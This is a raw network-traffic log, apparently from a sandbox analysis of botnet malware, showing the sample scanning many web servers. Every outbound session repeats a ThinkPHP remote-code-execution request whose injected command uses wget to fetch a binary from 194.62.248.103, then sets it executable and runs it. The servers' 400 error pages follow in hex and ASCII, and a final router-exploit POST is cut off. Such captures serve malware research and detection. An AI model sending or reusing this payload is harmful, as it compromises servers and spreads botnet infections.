                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        861192.168.2.2334702112.28.200.4080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.972285986 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:08.343132973 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 2833
                                                        Connection: close
                                                        x-ws-request-id: 661bea14_PS-HFE-017fv40_5011-37809
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 31 34 3a 33 37 3a 30 38 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 48 46 45 2d 30 31 37 66 76 34 30 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 62 69 6e 73 2f 78
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 14 Apr 2024 14:37:08 GMT<br><span class="F">IP: 81.181.54.60</span>Node information: PS-HFE-017fv40<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://194.62.248.103/bins/x
                                                        Apr 14, 2024 16:37:08.343204021 CEST1289INData Raw: 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c
                                                        Data Ascii: 86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 661bea14_PS-HFE-017fv40_5011-37809<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="h
                                                        Apr 14, 2024 16:37:08.343416929 CEST454INData Raw: 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61
                                                        Data Ascii: quests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">func
                                                        Apr 14, 2024 16:37:08.454397917 CEST454INData Raw: 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61
                                                        Data Ascii: quests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">func
                                                        Apr 14, 2024 16:37:08.642935991 CEST454INData Raw: 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61
                                                        Data Ascii: quests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">func


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        862192.168.2.2334700112.28.200.4080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.977631092 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:08.343077898 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 2832
                                                        Connection: close
                                                        x-ws-request-id: 661bea14_PS-HFE-017fv40_5006-5517
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 31 34 3a 33 37 3a 30 38 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 48 46 45 2d 30 31 37 66 76 34 30 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 62 69 6e 73 2f 78 38
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 14 Apr 2024 14:37:08 GMT<br><span class="F">IP: 81.181.54.60</span>Node information: PS-HFE-017fv40<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://194.62.248.103/bins/x8
                                                        Apr 14, 2024 16:37:08.343120098 CEST1289INData Raw: 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62
                                                        Data Ascii: 6 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 661bea14_PS-HFE-017fv40_5006-5517<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hid
                                                        Apr 14, 2024 16:37:08.343228102 CEST452INData Raw: 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c
                                                        Data Ascii: ests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">functi
                                                        Apr 14, 2024 16:37:08.447361946 CEST452INData Raw: 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c
                                                        Data Ascii: ests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">functi
                                                        Apr 14, 2024 16:37:08.639300108 CEST452INData Raw: 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c
                                                        Data Ascii: ests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">functi


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        863192.168.2.233953495.179.248.19480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:08.265275955 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:08.558106899 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        864192.168.2.235583695.101.200.22080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:08.272866011 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:08.573518038 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:08 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:08 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 33 66 30 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 38 26 23 34 36 3b 32 33 33 31 65 31 34 61 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 31 33 66 30 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 38 26 23 34 36 3b 32 33 33 31 65 31 34 61 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;13f01002&#46;1713105428&#46;2331e14a<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;13f01002&#46;1713105428&#46;2331e14a</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        865192.168.2.235053695.107.62.14580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:08.316936016 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        866192.168.2.234644688.99.226.5680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:10.994188070 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:11.301014900 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        867192.168.2.235632688.99.36.25080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:10.995821953 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:11.310017109 CEST474INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:11 GMT
                                                        Server: Apache
                                                        Content-Length: 296
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6e 6f 64 65 30 31 2e 66 69 73 70 74 65 73 74 30 31 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at node01.fisptest01.de Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        868192.168.2.236076631.125.38.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.331633091 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
